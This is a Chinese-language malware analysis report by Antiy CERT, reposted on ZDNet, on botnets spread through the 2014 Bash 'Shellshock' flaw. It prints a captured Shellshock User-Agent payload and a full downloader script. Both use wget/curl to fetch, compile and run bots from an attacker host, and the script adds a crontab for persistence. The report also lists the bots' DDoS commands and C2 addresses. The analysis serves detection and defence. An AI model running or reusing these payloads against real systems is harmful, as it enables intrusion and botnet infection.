扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
来源:ZDNet安全频道 2014年10月23日
关键字: 安天实验室 Bash“破壳”漏洞 分析 恶意代码
目 录
1.“破壳”漏洞概述... 2
2.网络数据包... 2
3.相关的恶意代码... 3
4.恶意代码同源性分析... 22
5.走出蠕虫地带(代小结)... 23
附录一:参考资料... 25
附录二:关于安天... 26
附录三:文档更新日志... 26
安天实验室安全研究与应急处理中心(以下简称:安天CERT)于9月25日凌晨开始响应“破壳”漏洞,针对该漏洞的背景、原理等进行了快速地分析,摸索完善了验证方法和网络检测方法。并于9月25日10时发布了《“破壳”漏洞(CVE-2014-6271)综合分析》(对应网址:http://www.antiy.com/response/CVE-2014-6271.html),并更新了多个版本。在这个过程中安天监测采集和样本交换体系发现了大量利用该漏洞的扫描攻击、后门投放等行为,并发现了多个与此漏洞相关的恶意代码。
基于漏洞的特点,安天利用与高校联合部署的“探云“体系等进行了流量监测。发现了捕获了部分网络攻击行为,下面列举一个攻击包进行说明:
从数据包信息可知:
来源 |
40:00:35:06:57:a2 |
目的 |
45:00:00:f7:93:86 |
Host |
124.128.18.77 |
User-Agent |
() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh" |
主要攻击载荷位于User-Agent信息,由于相关漏洞利用原理在《“破壳”漏洞(CVE-2014-6271)综合分析一》中都已分析过,我们不再赘述。从攻击载荷中我们可见,下载regular.bot文件到/tmp目录,命名为sh文件,并执行这个文件,执行中去下载了其它恶意代码文件,然后删除此文件。
用于攻击的sh文件和再次下载的恶意代码文件,都针对Linux\Unix\Mac OS等目标系统,格式为:ELF文件或perl、bash脚本。
针对CGI-BASH的利用漏洞的传播方式非常好实现,几句脚本就能够完成,核心是运用构造好的Http头,针对不同的IP进行探测,IP只要在Host信息更换即可。
样本命名 |
原始文件名 |
对应样本MD5 HASH |
样本大小(b) |
格式 |
Trojan[Bot]/Linux. Gafgyt.a |
未知(第三方样本) |
5B345869F7785F980 E8FF7EBC001E0C7 |
534,988 |
BinExecute/ Linux.ELF[:X86] |
Trojan[Bot]/Linux. Gafgyt.a |
未知(第三方样本) |
7DA247A78D11ED8 0F0282093824B5EEF |
538,444 |
BinExecute/ Linux.ELF[:X64] |
Trojan[Bot]/Linux. Gafgyt.a |
未知(第三方样本) |
74CF76B67834333 AF8B36BA89C1980C1 |
534,988 |
BinExecute/ Linux.ELF[:X86] |
Trojan[Bot]/Linux. Gafgyt.a |
未知(第三方样本) |
371B8B20D4DD207F 7B3F61BB30A7CB22 |
538,444 |
BinExecute/ Linux.ELF[:X64] |
Trojan[Bot]/Linux. Gafgyt.a |
未知(第三方样本) |
5924BCC045BB7039 F55C6CE29234E29A |
538,444 |
BinExecute/ Linux.ELF[:X64] |
Trojan[Bot]/Linux. WopBot |
未知(第三方样本) |
8DC64426F9D07587 C19E10F1BB3D2799 |
525,900 |
BinExecute/ Linux.ELF[:X64] |
Trojan/Linux. Small |
未知(第三方样本) |
2485040231A35B7A 465361FAF92A512D |
152 |
BinExecute/ Linux.ELF[:X64] |
Trojan[Downloader]/ Shell.Agent |
regular.bot |
2120361F5E06E89E 9387D044C7B0E7B0 |
701 |
Text/Shell.SH |
Trojan[Bot]/Linux. Tsunami |
kaiten.c |
E5807250E25DA45E 287AFB2F1E4580D6 |
391,30 |
Text/Dennis.C |
Trojan[Bot]/Linux. Tsunami |
a |
7390A1E62A88EB80 B5FAE80C9EB00BE7 |
982,256 |
BinExecute/ Linux.ELF[:X64] |
Trojan[Bot]/OSX. Tsunami |
darwin |
ADACF1FA8CD7F77A E83BA38A99160BDB |
42,436 |
BinExecute/ OSX.APP |
Trojan[Bot]/Perl .IRCBot |
pl |
0C25BEE177101B42 35022D694C0DE4D3 |
66,395 |
Text/Perl.Pl |
2.样本分析卡片:
样本命名 |
Trojan[Bot]/Linux.Gafgyt.a |
||||||||||||||||||||||||||||||
样本MD5 |
5924BCC045BB7039F55C6CE29234E29A |
||||||||||||||||||||||||||||||
样本大小(b) |
538,444b |
||||||||||||||||||||||||||||||
原始文件名 |
未知(第三方样本) |
||||||||||||||||||||||||||||||
格式 |
BinExecute/Linux.ELF[:X64] |
||||||||||||||||||||||||||||||
运行状态 |
在Debian 3.14.5 X86_64测试,列出当前机器MAC地址。 |
||||||||||||||||||||||||||||||
网络行为 |
连接远程IP:端口:89.238.***. ***:5 |
||||||||||||||||||||||||||||||
联网目标 |
主动连接控制端,一旦连接成功,便等待远程命令。 |
||||||||||||||||||||||||||||||
样本反汇编分析 |
获取本机IP 连接服务器 --------------------------------------------------------------------------------------------------------------------------------------------
TCP Flood DDoS攻击 UDP Flood DDoS攻击 --------------------------------------------------------------------------------------------------------------------------------------------
Hold Flood DDOS攻击 -------------------------------------------------------------------------------------------------------------------------------------------- . 结束攻击指令 弱口令字典 -------------------------------------------------------------------------------------------------------------------------------------------- 主要行为: 样本运行后尝试连接162.253.66.76:53/ 89.238.150.154:5中的一个服务器。 从以下文件中收集信息回传给服务器:/proc/cpuinfo、/proc/meminfo、/proc/net/route。 连接指定IP范围内计算机的23端口,账号密码通过弱口令字典生成。 从远程服务器接受指令运行,具体指令格式如下:
|
||||||||||||||||||||||||||||||
结论 |
该样本是Bot类样本,运行于Linux平台,主动连接控制端,等待远程控制。投放途径可能为利用“破壳”漏洞投放。 |
样本命名 |
Trojan[Backdoor]/Linux.Gafgyt.a |
样本MD5 |
371B8B20D4DD207F7B3F61BB30A7CB22 |
样本大小(b) |
538,444b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X64] |
运行状态 |
在Debian 3.14.5 X86_64测试,列出当前机器MAC地址 |
网络行为 |
连接远程IP:端口:162.253. **.**:53 |
联网目标 |
主动连接控制端,一旦连接成功,便等待远程命令 |
样本反汇编分析 |
该样本与5924BCC045BB7039F55C6CE29234E29A仅存在服务器IP差异,其他代码均完全相同,此处不再重复,具体行为可参见5924BCC045BB7039F55C6CE29234E29A。 |
结论 |
该样本是Bot类样本,运行于Linux平台,主动连接控制端,等待远程控制。投放途径可能为利用“破壳”漏洞投放。 |
样本命名 |
Trojan[Backdoor]/Linux.Gafgyt.a |
样本MD5 |
5B345869F7785F980E8FF7EBC001E0C7 |
样本大小(b) |
534,988b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X86] |
运行状态 |
在Debian 3.14.5 X86_64测试,无法运行,是ELF 32位程序 |
样本反汇编分析 |
控制命令:PING、GETLOCALIP、HOLD、JUNK、UDP、TCP、KILLATTK、LOLNOGTFO等。 连接远程IP:端口:162.253. **.**:53 该样本与5924BCC045BB7039F55C6CE29234E29A仅存在服务器IP差异,其他代码均完全相同,此处不再重复,具体行为可参见5924BCC045BB7039F55C6CE29234E29A。 |
样本命名 |
Trojan[Backdoor]/Linux.Gafgyt.a |
样本MD5 |
7DA247A78D11ED80F0282093824B5EEF |
样本大小(b) |
538,444b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X64] |
运行状态 |
在Debian 3.14.5 X86_64测试,列出当前机器MAC地址。 |
网络行为 |
连接远程IP:端口:89.238. ***.***:5 |
联网目标 |
主动连接控制端,一旦连接成功,便等待远程命令。 |
样本反汇编分析 |
该样本与5924BCC045BB7039F55C6CE29234E29A仅在数据段存在93字节差异,不影响样本功能,其他代码均完全相同,此处不再重复,具体行为可参见5924BCC045BB7039F55C6CE29234E29A。 |
结论 |
该样本是Bot类样本,运行于Linux平台,主动连接控制端,等待远程控制。投放途径可能为利用“破壳”漏洞投放。 |
样本命名 |
Trojan[Backdoor]/Linux.Gafgyt.a |
样本MD5 |
74CF76B67834333AF8B36BA89C1980C1 |
样本大小(b) |
534,988b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X86] |
运行状态 |
在Debian 3.14.5 X86_64测试,无法运行,是ELF 32位程序 |
样本反汇编分析 |
连接远程IP:端口:89.238. ***.***:5 该样本与5924BCC045BB7039F55C6CE29234E29A仅在数据段存在93字节差异,不影响具体功能,其他代码均完全相同,此处不再重复,具体行为可参见5924BCC045BB7039F55C6CE29234E29A。 |
样本命名 |
Trojan[Backdoor]Linux.WopBot |
样本MD5 |
8DC64426F9D07587C19E10F1BB3D2799 |
样本大小(b) |
525,900b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X64] |
运行状态 |
在Debian 3.14.5 X86_64测试,显示:Wopbot has started |
网络行为 |
连接远程IP:端口:89.238. ***.***:9003 |
联网目标 |
主动连接控制端,一旦连接成功,便等待远程命令。 |
样本反汇编分析 |
UDPDDOS攻击 SYN DDOS攻击 -------------------------------------------------------------------------------------------------------------------------------------------- TCP DDOS 攻击 HTTP DDOS攻击 -------------------------------------------------------------------------------------------------------------------------------------------- MINELORIS指令 结束攻击指令 -------------------------------------------------------------------------------------------------------------------------------------------- 样本运行后连接服务器接受指令控制,主要指令都是DDOS相关,如:kill、udp、syn、tcpamp、dildos、http、mineloris等。 |
结论 |
该样本是Bot类样本,运行于Linux平台,主动连接控制端,等待远程控制。投放途径可能为利用“破壳”漏洞投放。 |
样本命名 |
Trojan/Linux.Small |
样本MD5 |
2485040231A35B7A465361FAF92A512D |
样本大小(b) |
152b |
原始文件名 |
未知(第三方样本) |
格式 |
BinExecute/Linux.ELF[:X64] |
运行状态 |
在Debian 3.14.5 X86_64测试,无任何显示,但已执行 |
网络行为 |
连接远程IP:端口:27.19. ***.***:4545 |
样本反汇编分析 |
样本代码非常少,运行后连接27.*.*.224下载文件到/bin//sh并运行。 |
结论 |
主动连接控网络,下载恶意程序。 |
样本命名 |
Trojan[Downloader]/Shell.Agent |
样本MD5 |
2120361F5E06E89E9387D044C7B0E7B0 |
样本大小(b) |
701b |
原始文件名 |
regular.bot |
格式 |
Text/Shell.SH |
运行状态 |
运用gcc编译kaiten.c,执行a,执行darwin,执行pl,添加计划任务。 |
网络行为 |
下载:kaiten.c、a、darwin、pl |
脚本内容 |
killallperl
wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c; curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c; gcc -o /tmp/a /tmp/a.c; /tmp/a; rm -rf /tmp/a.c;
wget http://stablehost.us/bots/a -O /tmp/a; curl -o /tmp/a http://stablehost.us/bots/a; chmod +x /tmp/a; /tmp/a;
wget http://stablehost.us/bots/darwin -O /tmp/d; curl -o /tmp/d http://stablehost.us/bots/darwin; chmod +x /tmp/d; /tmp/d;
wget http://stablehost.us/bots/pl -O /tmp/pl; curl -o /tmp/pl http://stablehost.us/bots/pl; perl /tmp/pl; rm /tmp/pl;
echo "@weekly curl -o /tmp/sh http://stablehost.us/bots/regular.bot;wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh" >/tmp/c; crontab /tmp/c; rm /tmp/c; |
结论 |
该样本是一个sell脚本,下载Bot文件并运行,将更新URL添加到计划任务,定期下载执行。 |
样本命名 |
Trojan[Backdoor]/Linux.Tsunami |
样本MD5 |
E5807250E25DA45E287AFB2F1E4580D6 |
样本大小(b) |
391,30b |
原始文件名 |
kaiten.c |
格式 |
Text/Dennis.C |
来源地址 |
stablehost.us/bots/kaiten.c |
网络行为 |
编译执行后连接linksys.secureshellz.net |
样本格式 |
C源码 |
主要功能 |
kaiten.c文件中的所列的攻击指令列表如下: * TSUNAMI <target><secs> = A PUSH+ACK flooder * * PAN <target><port><secs> = A SYN flooder * * UDP <target><port><secs> = An UDP flooder * * UNKNOWN <target><secs> = Another non-spoof udp flooder * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from this bot * * ENABLE = Enables all packeting from this bot * * KILL = Kills the knight * * GET <http address><save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command -------------------------------------------------------------------------------------------------------------------------------------------- 部分函数代码: TSUNAMI 攻击代码 -------------------------------------------------------------------------------------------------------------------------------------------- SYN DDoS攻击代码 -------------------------------------------------------------------------------------------------------------------------------------------- UDP DDoS攻击代码 -------------------------------------------------------------------------------------------------------------------------------------------- 下载文件代码 |
结论 |
这是一个名为Tsunami的IRC DDOS client 的C源码文件,利用“破壳”漏洞下载到目标主机,并使用gcc命令编译为可执行程序后在目标主机执行。 |
样本命名 |
Trojan[Backdoor]/Linux.Tsunami |
样本MD5 |
7390A1E62A88EB80B5FAE80C9EB00BE7 |
样本大小(b) |
982,256b |
原始文件名 |
a |
格式 |
BinExecute/Linux.ELF[:X64] |
来源地址 |
stablehost.us/bots/a |
网络行为 |
连接:linksys.secureshellz.net |
样本格式 |
ELF 64-bit |
反汇编分析 |
服务器地址 -------------------------------------------------------------------------------------------------------------------------------------------- 更新服务器地址 -------------------------------------------------------------------------------------------------------------------------------------------- 结束自身 运行文件 -------------------------------------------------------------------------------------------------------------------------------------------- 下载其他文件 -------------------------------------------------------------------------------------------------------------------------------------------- 发起各类SYN和UDP的分布式拒绝服务攻击,具体如下:
|
结论 |
这是一个Linux僵尸网络程序,运行后会连接远程服务器,接受攻击者指令控制被感染主机。 |
样本命名 |
Trojan[Backdoor]/OSX.Tsunami |
样本MD5 |
ADACF1FA8CD7F77AE83BA38A99160BDB |
样本大小(b) |
42,436b |
原始文件名 |
darwin |
格式 |
BinExecute/OSX.APP |
来源地址 |
stablehost.us/bots/darwin |
网络行为 |
linksys.secureshellz.net |
样本格式 |
Mac OS X 64bit |
主要功能 |
该样本与7390A1E62A88EB80B5FAE80C9EB00BE7是相同的恶意代码,代码功能完全相同,只是运行的环境为Mac,具体功能可参见7390A1E62A88EB80B5FAE80C9EB00BE7。 |
结论 |
这是一个Mac僵尸网络程序,运行后会连接远程服务器,接受攻击者指令控制被感染主机。 |
样本命名 |
Trojan[Backdoor]/Perl.IRCBot |
样本MD5 |
0C25BEE177101B4235022D694C0DE4D3 |
样本大小(b) |
66,395b |
原始文件名 |
pl |
格式 |
Text/Perl.Pl |
来源地址 |
stablehost.us/bots/pl |
网络行为 |
连接远程IP:端口:125.211. ***.***:25 (linksys.secureshellz.net) |
主要功能 |
pl脚本中的命令列表 #-----[Hacking Based]----- # !bot @multiscan<vuln><dork> # !bot @socks5 # !bot @sql2 <vuln><dork><col> # !bot @portscan<ip> # !bot @logcleaner # !bot @sendmail<subject><sender><recipient><message> # !bot @system # !bot @cleartmp # !bot @rootable # !bot @nmap<ip><beginport><endport> # !bot @back <ip><port> # !bot @linuxhelp # !bot @cd tmp:. | for example #-----[Advisory-New Based]----- # !bot @packetstorm # !bot @milw0rm #-----[DDos Based]----- # !bot @udpflood<host><packet size><time> # !bot @tcpflood<host><port><packet size><time> # !bot @httpflood<host><time> # !bot @sqlflood<host><time> #-----[IRC Based]----- # !bot @killme # !bot @join #channel # !bot @part #channel # !bot @reset # !bot @voice <who> # !bot @owner <who> # !bot @deowner<who> # !bot @devoice <who> # !bot @halfop<who> # !bot @dehalfop<who> # !bot @op <who> # !bot @deop<who> #-----[Flooding Based]----- # !bot @msgflood<who> # !bot @dccflood<who> # !bot @ctcpflood<who> # !bot @noticeflood<who> # !bot @channelflood # !bot @maxiflood<who> #################################### |
相关配置 |
|
结论 |
这是一个Perl脚本编写的僵尸网络程序,根据内部配置和控制端发送的指令进行相应的攻击。 |
安天“探云”系统及形成部署的VDS网络病毒监控设备均捕获到大量攻击包。通过对其中的攻击载荷的提取,发现存在大量自动的重复载荷投放。例如第二章中的数据包中的载荷就存在大量重复投放的现象。这样便可实现批量的攻击。下面以第二章所列出的数据包的相关攻击过程为例,分析其攻击和使用相关样本的作业过程。图3-1中4个相关样本均为僵尸网络程序,得出攻击者是将不同操作系统、运行环境下编译的同一源程序文件进行投放,以达到能够感染Linux、Mac及支持gcc或Perl环境的相关系统。
图3-1漏洞与样本作业流程图
为了适应32位与64位结构,在两种版本的操作系统上都能够运行,攻击者进行了同一源码的多次的编译。为了能够躲避反病毒软件的检测查杀,攻击者也进行了简单的混淆。但无论是不同版本编译,还是做各种混淆,攻击者基于同一源码所做的程序文件仍能够找到共同点,这些共同点为我们确定同源性提供了便利。具体见图4-1,我们发现在两个不同事件中的6个“破壳”投放的Bot具有同源性。
图4-1恶意代码同源性分析图
我们在《“破壳”漏洞(CVE-2014-6271)综合分析》(《破壳》三部曲之一)报告中指出“破壳”漏洞“易于利用其编写蠕虫进行自动化传播,同时也将导致僵尸网络的发展”。几年来,尽管我们捕获的蠕虫样本数量还在持续增长,但其中真正有重大影响力的蠕虫确实并不多见。但今天,我们看到了“蠕虫”这个熟悉而陌生的老对手,借助“破壳”漏洞借尸还魂。如果说技术的发展是一个上升的螺旋,在某一时刻会表现出“高阶重复”的话,那么威胁的演进何尝不是如此呢?
反病毒工作者和反病毒产品为消亡蠕虫进行了很多尝试,但蠕虫大面积减少的更大原因还是其生态的变化。Windows系统控制Outlook的外部调用,沉重打击了邮件蠕虫的传播;DEP、ASLR、UAC等机制的引入,大大降低了扫描溢出型蠕虫传播的效果;对自动播放的控制,又降低了U盘传播。而从另一个角度看,随着漏洞私密化、攻击定向化的趋势,有编写蠕虫价值的漏洞,都被攻击者深藏武库,谨慎使用。而同时,一些僵尸网络的控制者,也逐渐把利用蠕虫的方式扩展规模,改为捆绑和FAKEAV等其他方式。
《走出蠕虫地带》是安天技术负责人在去年XDEF峰会上的同名报告,也是安天AVER反思三部曲的第二部。报告反思了我们现有的大量从感知到分析的技术体系,都是在蠕虫时代发端建立起来的,其假定威胁的核心特点是攻击载荷不断重复投放、传播路径是从若干源头的树状展开、被感染的节点会大量分布。显然这种机制在APT的应对中变得薄弱和力不从心。而同时我们也看到更多用户也是在大规模蠕虫泛滥时,逐渐建立起安全观念的,往往只有网络大量阻塞时,人们才感到网络威胁的价值。而此间,那些更高级、隐蔽可以带来战略影响的攻击与窃密则可能被忽略了。
这次也是如此,连我们自己都是在相关BOT和蠕虫出现后,兴奋度异常提高。但我们要慎重看待这种“高阶重复”。如果说一切安全威胁都存在着必然性,有其规律和动力的话。我们只能说,当漏洞掌握在少数攻击者手中时,可能其表象会是发生在定向攻击乃至APT攻击当中,以提高成功率和降低感知。但当严重漏洞一旦公开,其不再具有任何隐蔽性可言,而大量用户启动修补流程,可攻击节点不断减少的时候。就会有更多的攻击者开始了利益最大化的数据或者节点的攫取,此时“列王的纷争”就会变成“群鸦的盛宴”。
关于“心脏出血”是三年来最严重的漏洞定性后不过半年,“破壳”漏洞突然曝光,然不过几日:CVE-2014-6271、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277接踵而至。严重漏洞的披露,经常有示范和攀比效应,这是我们暂时能想到的“扎堆到来”的成因。每个地震都有连锁余震,之后群鸦漫天。
同时,站在一个更熟悉Windows的安全团队视角看Linux/MacOS,无疑会有很多茫然,重新编译带来诸多的不变,大量版本带来的碎片化,又给修补带来了很多不确定性。而自带的编译器和丰富的脚本则既是程序员的舞台,也是攻击者的土壤。我们在Windows攻防中,也经常可见BAT和VBS脚本,但通常都是配角而非恶意代码功能主体。而除非目标是代码污染,把一段C++源码或者工程丢到被攻击者的场景中去编译的行为更非常罕见。而本报告中的gcc源码和perl脚本,则价值完全不同,而这种模式在过去和未来也都并不陌生。这个方式既符合场景特点,同时也是一个轻量级的“免杀”。而未来Linux/MacOS将是重要的攻防战场,尽管相关恶意代码的加壳、混淆工具和Windows下大量的地下壳、商用壳相比还那样简单幼稚,但一切早已经开始了。
此版本修订完成之际临近午饭,此时正值国庆假期前最后一个工作日,后勤组的同事正在分发福利,多数下午同事会提前放假。而我们,代号“弹头”的安天深度分析组会留下坚守。这种感觉在安天的集体记忆中似曾相识,2003年的Slammer爆发就在农历腊月二十三、被称为小年的那一天,窗外鞭炮齐鸣,网络上病毒数据包蜂拥而过,而安天人在突击的编写检测和处置工具。2004年5月1日,当pluck等辗转在回家的长途车上的时候,他从短信里知道了震荡波蠕虫爆发的消息,以及要求归队的命令。
威胁经常在人们不期望它们到来的时候到来,也许是无心的雪崩,也许是有意的蓄谋。“病毒不会在星期天休息”这是安天新员工培训时必须传递的一句话,我们从安天工程师李柏松那里听到过这句话,我们也把这句话讲给过安天的新人。
我们也许会在一瞬间被威胁打的措手不及,但不会有威胁能长久的逃逸出我们的感知和分析。
谨把我们的工作献给我们家人、我们的战友和我们的祖国。
[1] 安天实验室:《"破壳"漏洞(CVE-2014-6271)综合分析》
http://www.antiy.com/response/CVE-2014-6271.html
[2] 知道创宇:《破壳漏洞(ShellShock)应急概要》
http://blog.knownsec.com/2014/09/shellshock_response_profile/
[3] 知道创宇:《Bash 3.0-4.3命令执行漏洞分析》
http://blog.knownsec.com/2014/09/bash_3-0-4-3-command-exec-analysis/
[4] First Shellshock botnet attacks Akamai US DoD networks
http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
[5] Linux ELF bash 0day (shellshock): The fun has only just begun...
http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html
[6] 安天实验室:《走出蠕虫木马地带『AVER反思三部曲之二』》
http://www.antiy.com/presentation/Methodology_AVER_Introspection_Trilogy_II.html
安天是专业的下一代安全检测引擎研发企业,安天的检测引擎为网络安全产品和移动设备提供病毒和各种恶意代码的检测能力,并被超过十家以上的著名安全厂商所采用,全球有数万台防火墙和数千万部手机的安全软件内置有安天的引擎。安天获得了2013年度AV-TEST年度移动设备最佳保护奖。依托引擎、沙箱和后台体系的能力,安天进一步为行业企业提供有自身特色的基于流量的反APT解决方案。
关于反病毒引擎更多信息请访问: |
http://www.antiy.com(中文) http://www.antiy.net(英文) |
关于安天反APT相关产品更多信息请访问: |
更新日期 |
更新版本 |
更新内容 |
2014-09-29 10:00 |
V1.0 |
文档创建、文档架构、文档概述 |
2014-09-29 12:00 |
V1.1 |
网络数据包、恶意代码分析 |
2014-09-29 16:00 |
V1.2 |
增加VDS匹配样本分析 |
2014-09-29 16:30 |
V1.3 |
增加perl分析 |
2014-09-29 18:50 |
V1.4 |
增加各样本单独分析(网络、代码) |
2014-09-29 20:30 |
V1.5 |
增加破壳漏洞利用代码流程分析 |
2014-09-29 22:30 |
V1.6 |
增加破壳漏洞投放样本同源性分析 |
2014-09-30 00:30 |
V1.7 |
针对Linux/MacOS恶意代码总结 |
2014-09-30 11:30 |
V1.8 |
修改总结 |
2014-09-30 18:59 |
V1.81 |
完善、修订和纠错 |
2014-10-13 11:40 |
V1.82 |
更换模板 |
2014-10-199:30 |
V1.9 |
样本分析内容修改 |
——安天实验室安全研究与应急处理中心(安天 CERT)
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者